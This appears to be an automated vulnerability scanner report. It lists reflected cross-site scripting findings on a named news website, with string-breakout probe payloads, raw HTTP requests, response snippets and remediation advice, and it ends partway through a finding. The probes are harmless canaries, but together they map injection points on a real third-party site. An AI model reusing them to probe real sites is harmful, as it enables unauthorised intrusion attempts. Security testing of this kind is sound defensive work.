GET /opinionf5ee0'%3b4204e92570a/letters/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:28:30 GMT
X-Varnish: 570577664
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b533"%3b74741faa0e8 was submitted in the REST URL parameter 1. This input was echoed as 3b533";74741faa0e8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion3b533"%3b74741faa0e8/letters/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14768
Date: Mon, 13 Dec 2010 21:28:07 GMT
X-Varnish: 570577178
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion3b533";74741faa0e8"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce0f8'%3b083cb55fe87 was submitted in the REST URL parameter 1. This input was echoed as ce0f8';083cb55fe87 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionce0f8'%3b083cb55fe87/mastio/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14768
Date: Mon, 13 Dec 2010 21:30:18 GMT
X-Varnish: 570579890
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30d39"%3b7146f514f8f was submitted in the REST URL parameter 1. This input was echoed as 30d39";7146f514f8f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion30d39"%3b7146f514f8f/mastio/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14569
Date: Mon, 13 Dec 2010 21:30:01 GMT
X-Varnish: 570579400
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opinion30d39";7146f514f8f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f790'%3bd80e156fd18 was submitted in the REST URL parameter 1. This input was echoed as 1f790';d80e156fd18 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion1f790'%3bd80e156fd18/nugent/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14768
Date: Mon, 13 Dec 2010 21:30:05 GMT
X-Varnish: 570579492
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a405a"%3b2ccc25c0640 was submitted in the REST URL parameter 1. This input was echoed as a405a";2ccc25c0640 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona405a"%3b2ccc25c0640/nugent/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14583
Date: Mon, 13 Dec 2010 21:29:41 GMT
X-Varnish: 570578852
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ipt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="opiniona405a";2ccc25c0640"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8b26'%3ba4e5ab55b19 was submitted in the REST URL parameter 1. This input was echoed as e8b26';a4e5ab55b19 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productse8b26'%3ba4e5ab55b19/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14591
Date: Mon, 13 Dec 2010 21:37:45 GMT
X-Varnish: 570590180
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 827ab"%3b15eb5b6c73 was submitted in the REST URL parameter 1. This input was echoed as 827ab";15eb5b6c73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /products827ab"%3b15eb5b6c73/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14744
Date: Mon, 13 Dec 2010 21:37:27 GMT
X-Varnish: 570589965
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... pt"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="products827ab";15eb5b6c73"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c48a"%3b042a1643298 was submitted in the REST URL parameter 1. This input was echoed as 6c48a";042a1643298 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration6c48a"%3b042a1643298/register/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14769
Date: Mon, 13 Dec 2010 21:37:42 GMT
X-Varnish: 570590113
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]...
window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="registration6c48a";042a1643298"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a585'%3b4bb7f723b0b was submitted in the REST URL parameter 1. This input was echoed as 1a585';4bb7f723b0b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration1a585'%3b4bb7f723b0b/register/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14775
Date: Mon, 13 Dec 2010 21:37:57 GMT
X-Varnish: 570590571
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dcc2"%3b014c762bb9d was submitted in the REST URL parameter 1. This input was echoed as 4dcc2";014c762bb9d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports4dcc2"%3b014c762bb9d/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14739
Date: Mon, 13 Dec 2010 21:31:06 GMT
X-Varnish: 570580960
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports4dcc2";014c762bb9d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38e13'%3b4375bb808eb was submitted in the REST URL parameter 1. This input was echoed as 38e13';4375bb808eb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports38e13'%3b4375bb808eb/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14564
Date: Mon, 13 Dec 2010 21:31:47 GMT
X-Varnish: 570581517
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a171'%3b053bdd86491 was submitted in the REST URL parameter 1. This input was echoed as 1a171';053bdd86491 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports1a171'%3b053bdd86491/baseball/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14746
Date: Mon, 13 Dec 2010 21:31:08 GMT
X-Varnish: 570580682
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db4fd"%3bbca7d04b87c was submitted in the REST URL parameter 1. This input was echoed as db4fd";bca7d04b87c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsdb4fd"%3bbca7d04b87c/baseball/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14739
Date: Mon, 13 Dec 2010 21:30:52 GMT
X-Varnish: 570580652
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsdb4fd";bca7d04b87c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5afbd"%3b2cd1e6d43c0 was submitted in the REST URL parameter 1. This input was echoed as 5afbd";2cd1e6d43c0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports5afbd"%3b2cd1e6d43c0/basketball/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14746
Date: Mon, 13 Dec 2010 21:31:07 GMT
X-Varnish: 570580969
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports5afbd";2cd1e6d43c0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d979e'%3b0d07eaae8cc was submitted in the REST URL parameter 1. This input was echoed as d979e';0d07eaae8cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsd979e'%3b0d07eaae8cc/basketball/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14739
Date: Mon, 13 Dec 2010 21:31:36 GMT
X-Varnish: 570581281
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e37a4'%3bbce5628276c was submitted in the REST URL parameter 1. This input was echoed as e37a4';bce5628276c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportse37a4'%3bbce5628276c/football/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14763
Date: Mon, 13 Dec 2010 21:32:30 GMT
X-Varnish: 570582428
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29226"%3bdb736c53825 was submitted in the REST URL parameter 1. This input was echoed as 29226";db736c53825 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports29226"%3bdb736c53825/football/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14746
Date: Mon, 13 Dec 2010 21:32:06 GMT
X-Varnish: 570582169
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports29226";db736c53825"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dc80"%3b681330eac9 was submitted in the REST URL parameter 1. This input was echoed as 6dc80";681330eac9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports6dc80"%3b681330eac9/golf/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14734
Date: Mon, 13 Dec 2010 21:32:09 GMT
X-Varnish: 570582013
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sports6dc80";681330eac9"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f127c'%3b476e511c3ed was submitted in the REST URL parameter 1. This input was echoed as f127c';476e511c3ed in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsf127c'%3b476e511c3ed/golf/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14564
Date: Mon, 13 Dec 2010 21:32:24 GMT
X-Varnish: 570582258
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec82e"%3b67b46d440e0 was submitted in the REST URL parameter 1. This input was echoed as ec82e";67b46d440e0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsec82e"%3b67b46d440e0/hockey/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14769
Date: Mon, 13 Dec 2010 21:31:42 GMT
X-Varnish: 570581625
Age: 0
Via: 1.1 varnish
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... ript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="sportsec82e";67b46d440e0"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea866'%3ba081e53b159 was submitted in the REST URL parameter 1. This input was echoed as ea866';a081e53b159 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sportsea866'%3ba081e53b159/hockey/ HTTP/1.1
Host: www.washingtontimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 NOT FOUND
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14739
Date: Mon, 13 Dec 2010 21:32:01 GMT
X-Varnish: 570581873
Age: 0
Via: 1.1 varnish
Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ef81'%3b1c6ec8140f7 was submitted in the REST URL parameter 1. This input was echoed as 2ef81';1c6ec8140f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
